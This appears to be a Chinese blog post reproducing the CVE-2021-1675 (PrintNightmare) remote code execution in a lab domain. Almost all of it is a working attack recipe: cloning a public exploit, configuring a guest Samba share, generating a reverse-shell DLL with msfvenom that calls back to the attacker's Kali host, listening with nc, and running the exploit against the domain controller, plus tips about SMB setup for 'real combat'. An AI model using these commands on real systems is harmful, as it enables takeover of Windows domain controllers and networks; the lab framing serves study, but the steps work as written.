前言
为了复现前几天爆出的CVE-2021-1675远程RCE,我的周末过得很充实,谨以此篇记录那个永远都回不来的周末。
测试环境
DC:Windows Server 2019 192.168.110.110
PC:Windows 10 192.168.110.120
Attack:Kali2020.3 192.168.110.132
在域控Windows Server 2019
上创建普通域用户user1
,使用user1
登录域主机Windows 10
确定可用
远程RCE复现
exp地址:https://github.com/cube0x0/CVE-2021-1675
git clone https://github.com/cube0x0/CVE-2021-1675.git
按照exp项目上smb上传后执行的方法,配置kali的smb配置文件/etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody
启动smb
impacket-smbserver smb /tmp/
kali使用msf生成dll木马:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.132 LPORT=7777 -f dll -o /tmp/sjbs.dll
并监听端口:
nc -lvvp 7777
运行exp:
python3 CVE-2021-1675.py hacker.test/win10:ShiJinBuShi@192.168.110.110 '\\192.168.110.132\smb\sjbs.dll'
看到刚生成的dll木马成功上传到了域控服务器:
接收到shell:
踩到的坑
域控服务器:最开始是使用的Windows Server 2012 R2
,可惜不管什么姿势都无法成功。后来学长告诉我:
Kali的smb服务:正常起smb服务后运行exp报错了
本地测试一下:
管理员权限powershell启用smb1后就好了:
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
但是实战中我们不可能去域控上打开SMB1,所以只需要Windows开启smb,将dll文件放在Windows的共享目录并在运行exp时使用该地址即可。
本篇参考: